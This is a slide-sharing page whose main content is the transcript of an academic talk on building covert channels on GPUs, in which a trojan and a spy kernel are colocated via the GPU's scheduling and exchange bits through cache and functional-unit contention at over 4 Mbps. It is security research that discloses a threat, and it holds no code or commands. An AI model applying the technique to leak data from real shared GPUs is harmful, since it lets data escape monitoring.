Hoda NaghibiJouybari Khaled N. Khasawneh and Nael Abu-Ghazaleh

Slides:

Advertisements

Similar presentations

Orchestrated Scheduling and Prefetching for GPGPUs Adwait Jog, Onur Kayiran, Asit Mishra, Mahmut Kandemir, Onur Mutlu, Ravi Iyer, Chita Das.

Advertisements

Instructor Notes We describe motivation for talking about underlying device architecture because device architecture is often avoided in conventional.

Scalable Multi-Cache Simulation Using GPUs Michael Moeng Sangyeun Cho Rami Melhem University of Pittsburgh.

A Complete GPU Compute Architecture by NVIDIA Tamal Saha, Abhishek Rawat, Minh Le {ts4rq, ar8eb,

Optimization on Kepler Zehuan Wang

A Case Against Small Data Types in GPGPUs Ahmad Lashgar and Amirali Baniasadi ECE Department University of Victoria.

Department of Computer Science and Engineering University of Washington Brian N. Bershad, Stefan Savage, Przemyslaw Pardyak, Emin Gun Sirer, Marc E. Fiuczynski,

Chimera: Collaborative Preemption for Multitasking on a Shared GPU

OWL: Cooperative Thread Array (CTA) Aware Scheduling Techniques for Improving GPGPU Performance Adwait Jog, Onur Kayiran, Nachiappan CN, Asit Mishra, Mahmut.

Neither More Nor Less: Optimizing Thread-level Parallelism for GPGPUs Onur Kayıran, Adwait Jog, Mahmut Kandemir, Chita R. Das.

1 Threading Hardware in G80. 2 Sources Slides by ECE 498 AL : Programming Massively Parallel Processors : Wen-Mei Hwu John Nickolls, NVIDIA.

L13: Review for Midterm. Administrative Project proposals due Friday at 5PM (hard deadline) No makeup class Friday! March 23, Guest Lecture Austin Robison,

Sunpyo Hong, Hyesoon Kim

© David Kirk/NVIDIA and Wen-mei W. Hwu, 2007 ECE 498AL, University of Illinois, Urbana-Champaign 1 ECE 498AL Lectures 7: Threading Hardware in G80.

CuMAPz: A Tool to Analyze Memory Access Patterns in CUDA

Unifying Primary Cache, Scratch, and Register File Memories in a Throughput Processor Mark Gebhart 1,2 Stephen W. Keckler 1,2 Brucek Khailany 2 Ronny Krashinsky.

© David Kirk/NVIDIA and Wen-mei W. Hwu, ECE 498AL, University of Illinois, Urbana-Champaign 1 CS 395 Winter 2014 Lecture 17 Introduction to Accelerator.

(1) Kernel Execution ©Sudhakar Yalamanchili and Jin Wang unless otherwise noted.

Understanding Outstanding Memory Request Handling Resources in GPGPUs

© David Kirk/NVIDIA and Wen-mei W. Hwu, ECE 498AL, University of Illinois, Urbana-Champaign 1 ECE 498AL Lectures 8: Threading Hardware in G80.

Some key aspects of NVIDIA GPUs and CUDA. Silicon Usage.

Warp-Level Divergence in GPUs: Characterization, Impact, and Mitigation Ping Xiang, Yi Yang, Huiyang Zhou 1 The 20th IEEE International Symposium On High.

Sunpyo Hong, Hyesoon Kim

GPU Performance Optimisation Alan Gray EPCC The University of Edinburgh.

My Coordinates Office EM G.27 contact time:

1 ITCS 4/5010 CUDA Programming, UNC-Charlotte, B. Wilkinson, Jan 28, 2013 Branching.ppt Control Flow These notes will introduce scheduling control-flow.

Henry Wong, Misel-Myrto Papadopoulou, Maryam Sadooghi-Alvandi, Andreas Moshovos University of Toronto Demystifying GPU Microarchitecture through Microbenchmarking.

Warped-Slicer: Efficient Intra-SM Slicing through Dynamic Resource Partitioning for GPU Multiprogramming Qiumin Xu*, Hyeran Jeon ✝, Keunsoo Kim ❖, Won.

Performance modeling in GPGPU computing Wenjing xu Professor: Dr.Box.

1 ”MCUDA: An efficient implementation of CUDA kernels for multi-core CPUs” John A. Stratton, Sam S. Stone and Wen-mei W. Hwu Presentation for class TDT24,

Android’s Malware Attack, Stealthiness and Defense: An Improvement Mohammad Ali, Humayun Ali and Zahid Anwar 2011 Frontiers of Information Technology.

Single Instruction Multiple Threads

Covert Channels Through Branch Predictors: a Feasibility Study

Computer Engg, IIT(BHU)

Predictable Cache Coherence for Multi-Core Real-Time Systems

Employing compression solutions under openacc

Sathish Vadhiyar Parallel Programming

CS427 Multicore Architecture and Parallel Computing

Exploiting Inter-Warp Heterogeneity to Improve GPGPU Performance

Adaptive Cache Partitioning on a Composite Core

Advanced Operating Systems (CS 202)

ISPASS th April Santa Rosa, California

RIC: Relaxed Inclusion Caches for Mitigating LLC Side-Channel Attacks

ECE 498AL Spring 2010 Lectures 8: Threading & Memory Hardware in G80

Lecture 5: GPU Compute Architecture

RANDOM FILL CACHE ARCHITECTURE

Gwangsun Kim Niladrish Chatterjee Arm, Inc. NVIDIA Mike O’Connor

Xia Zhao*, Zhiying Wang+, Lieven Eeckhout*

RegLess: Just-in-Time Operand Staging for GPUs

Mattan Erez The University of Texas at Austin

Hoda NaghibiJouybari Khaled N. Khasawneh and Nael Abu-Ghazaleh

Eiman Ebrahimi, Kevin Hsieh, Phillip B. Gibbons, Onur Mutlu

Presented by: Isaac Martin

Complexity effective memory access scheduling for many-core accelerator architectures Zhang Liang.

Layer-wise Performance Bottleneck Analysis of Deep Neural Networks

Milad Hashemi, Onur Mutlu, Yale N. Patt

Exploiting Inter-Warp Heterogeneity to Improve GPGPU Performance

Lecture 5: GPU Compute Architecture for the last time

NVIDIA Fermi Architecture

Degree-aware Hybrid Graph Traversal on FPGA-HMC Platform

University of California, Riverside

University of Wisconsin-Madison

Presented by Neha Agrawal

Mattan Erez The University of Texas at Austin

©Sudhakar Yalamanchili and Jin Wang unless otherwise noted

Mattan Erez The University of Texas at Austin

Graphics Processing Unit

6- General Purpose GPU Programming

CIS 6930: Chip Multiprocessor: Parallel Architecture and Programming

CIS 6930: Chip Multiprocessor: Parallel Architecture and Programming

Presentation transcript:

Hoda NaghibiJouybari Khaled N. Khasawneh and Nael Abu-Ghazaleh Constructing and Characterizing Covert Channels on GPGPUs Hoda NaghibiJouybari Khaled N. Khasawneh and Nael Abu-Ghazaleh

Covert Channel Malicious indirect communication of sensitive data. Why? There is no communication channel. The communication channel is monitored. Covert channel is undetectable by monitoring systems on conventional communication channels. Trojan Spy Covert Channel Gallery App Weather App

Covert channel are a substantial threat on GPGPUs Trends to improve multiprogramming on GPGPUs. GPU-accelerated computing available on major cloud platforms No protection offered by an Operating system High quality (low noise) and Bandwidth

Overview Threat: Using GPGPUs for Covert Channels. To demonstrate the threat: We construct error-free and high bandwidth covert channels on GPGPUs. Reverse engineer scheduling at different levels on GPU Exploit scheduling to force colocation of two applications Create contention on shared resources Remove noise Key Results: Error-free covert channels with bandwidth of over 4 Mbps.

GPU Architecture Intra-SM Channels: L1 constant cache, functional units and warp schedulers Inter-SM Channels: L2 constant cache, global memory

Colocate Spy and Trojan Construct the Channels Remove Noise Attack Flow Colocate Spy and Trojan Construct the Channels Remove Noise

Colocation (Reverse Engineering the Scheduling) Step 1: Thread block scheduling to the SMs Kernel 1 Kernel 2 TB0 TB1 TBn TB0 TB1 TBn GPU Thread Block Scheduler TB0 TB1 TBn TB0 TB1 TBn Leftover Policy SM0 SM1 SMm Interconnection Network L2 Cache and Memory Channels

Step 2: Warp to warp schedulers mapping TB TB W0 W1 Wk-1 Wk W0 W1 Wk-1 Wk Warp Scheduler Warp Scheduler SMk TBi TBj Dispatch Unit Dispatch Unit Register File SP SP SP DP L/D SFU SP SP SP DP L/D SFU Shared Memory / L1 Cache

Colocate Spy and Trojan Construct the Channels Remove Noise Attack Flow Colocate Spy and Trojan Construct the Channels Remove Noise

Cache Channel (intra-SM and inter-SM) Extracting the cache parameters using latency plot. (cache size, number of sets, number of ways and line size) Communicating through one cache set. Spy Trojan Eviction of Spy data Send 0 Send 1 Cache misses Cache Hit Low Latency Constant Cache set x No Access! Higher Latency Constant Memory Spy Data Array (SD) Trojan Data Array (TD)

Synchronization: L1 Constant cache 1 Wait (ReadytoSend) Trojan Wait (ReadytoReceive) 1 Spy 1 …011001 Receive 6 bits Thread 0-5 1 Thread 0-5 1

Synchronization and Parallelization GPU SM 0 SM 1 SM n …

SFU and Warp scheduler Channel (intra-SM) Limitation on number of issued operations in each cycle: Type and number of functional units. Issue bandwidth of warp schedulers Contention is isolated to warps assigned to the same warp scheduler. Kepler SM

SFU and Warp scheduler Channel (intra-SM) Spy Trojan Base Channel Does operations to the target functional unit and measures the time. Low latency: “0” High latency: “1” Does operations to the target functional unit to create contention to send “1”. No operation to send “0”. Communicating different bits through warps assigned to different warp schedulers. Improved BW Parallelism at Warp Scheduler level Parallelism at SM level

Colocate Spy and Trojan Construct the Channels Remove Noise Attack Flow Colocate Spy and Trojan Construct the Channels Remove Noise

Back Propagation Kmeans Heart Wall K-Nearest Neighbor … What about other concurrent applications co-located with spy and trojan? GPU SM …

Exclusive Colocation of Spy and Trojan Concurrency limitations on GPU hardware (leftover policy): Shared Memory Register Number of Thread blocks Spy Trojan TB0 TB1 TBn TB0 TB1 TBn Prevented interference from Rodinia Benchmark workloads on covert communication and achieved error free communication in all cases. GPU SM Shared Memory Kmeans Back Propagation Heart Wall K-Nearest Neighbor … Spy Shared Memory … Register Register Trojan No Resource Left!

Results Error-free bandwidth of over 4 Mbps L1 Cache Covert channel bandwidth on three generations of Real NVIDIA GPUs 12.9 x Error-free bandwidth of over 4 Mbps The fastest known micro-architectural covert channel under realistic conditions. 3.8 x 1.7 x

Results SFU Covert channel bandwidth on three generations of Real NVIDIA GPUs 13 x 3.5 x

Conclusion GPUs improved multiprogramming makes the covert channels a substantial threat. Colocation at different levels by leveraging thread block scheduling and warp to warp scheduler mapping. GPU inherent parallelism and specific architectural features provides very high quality and bandwidth channels; up to over 4Mbps error-free channel.

Thank You!